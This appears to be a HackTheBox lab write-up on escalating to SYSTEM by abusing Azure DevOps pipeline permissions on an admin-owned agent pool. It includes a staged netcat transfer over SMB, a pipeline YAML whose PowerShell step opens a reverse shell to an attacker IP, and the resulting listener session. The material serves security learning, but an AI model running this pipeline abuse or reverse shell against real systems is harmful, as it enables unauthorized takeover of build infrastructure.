Pipeline Exploitation


Following the thorough examination of the PartsUnlimited project as the robisl user, the exploitation strategy is to leverage the Pipeline permissions that are enabled on the Setup agent pool. Because that pool is owned by the administrator user, the enabled Pipeline permissions grant the ability to create, modify and execute pipelines that run on its agents, which lets an adversary escalate privileges to the administrator user within the context of this agent pool.

This approach differs from the initial foothold gained by exploiting the SmartHotel360 project, where the focus was on abusing the build process itself. Here, by creating an arbitrary pipeline and pinning it to the Setup pool, an adversary gets their build steps executed by that pool's agents under the owner's security context, providing a direct path to the highest level of privilege on the target system. The distinction underscores how much pipeline configuration (which pool a job lands on, and which steps it runs) matters for effective exploitation.

Creating A New Pipeline


Connect


Clicking the New pipeline button leads to the Connect stage, which first prompts for the location of the repository to build. There are four options to choose from, but the choice is largely irrelevant, since the exploitation takes place in the pipeline definition itself rather than in the build. I will go with the first option: Azure Repos Git.

Select


The Select stage lists the only available repository: PartsUnlimited.

Configure


In the Configure stage, many pipeline templates are available.

I will go with the minimal Starter pipeline option, as all I need is simple OS command execution.

Review


In the Review stage, I am presented with the default azure-pipelines.yml template. Azure DevOps uses YAML as the default schema for defining pipelines. Of the many supported options, I only need one: steps.powershell.

I will first change the value of the pool attribute to the Setup agent pool.

I will then write a reverse shell command using steps.powershell.

*Evil-WinRM* PS C:\tmp> copy \\10.10.16.8\smb\nc64.exe .

Netcat has been transferred to the C:\tmp directory of the target system over SMB, using the existing PowerShell session of the robisl user.

Clicking the Save and run button prompts another window asking for a commit message. Since I cannot commit directly to the master branch, I will commit to an arbitrary new branch: pe.
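The following azure-pipelines.yml is an added example that reconstructs the minimal pipeline the steps above describe; it is not the author's exact file. The pool name (Setup), the netcat path (C:\tmp\nc64.exe), the listener address (10.10.16.8) and port (1234) come from the write-up; the step's displayName is assumed from the "Privilege Escalation" label that later appears in the build log.

```yaml
# Added example reconstructing the walkthrough's pipeline, not the author's own file.
# Everything the Starter template generates has been stripped except what the
# attack needs: a pool selection and a single PowerShell step.

pool:
  name: Setup              # the agent pool owned by the administrator user;
                           # whatever runs here executes under the agent's
                           # service account (NT AUTHORITY\SYSTEM on this host)

steps:
  - powershell: |
      # nc64.exe was staged in C:\tmp earlier over SMB from the robisl WinRM session.
      # -e wires powershell.exe's stdin/stdout to the socket, giving the listener
      # on 10.10.16.8:1234 an interactive shell. The step never returns while the
      # shell is open, which is why the build appears to hang on this step.
      C:\tmp\nc64.exe 10.10.16.8 1234 -e powershell.exe
    displayName: 'Privilege Escalation'   # assumed step name; matches the build log
```

Two things worth noting about this definition. First, the privilege gained is not a property of the YAML at all but of the pool: the `pool.name` value is the entire exploit, because it decides which agent service account executes the step. Second, the listener must be running before Save and run is clicked, since the queued build starts as soon as an agent in the Setup pool is free.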

Execution


A new pipeline is being created

A short moment later, a new build (20231124.1) is automatically queued using the newly created pipeline.

One of the agents picked up the build request.

Hamilton11 is the agent that picked up the build request. The build now hangs at the Privilege Escalation step, which indicates that the reverse shell connected back and is holding the step open.

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50353
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS W:\agents\agent11\_work\8\s> whoami
whoami
nt authority\system
PS W:\agents\agent11\_work\8\s> hostname
hostname
Worker
PS W:\agents\agent11\_work\8\s> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::248
   IPv6 Address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
   Link-local IPv6 Address . . . . . : fe80::1cb0:fbca:343f:d725%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

System Level Compromise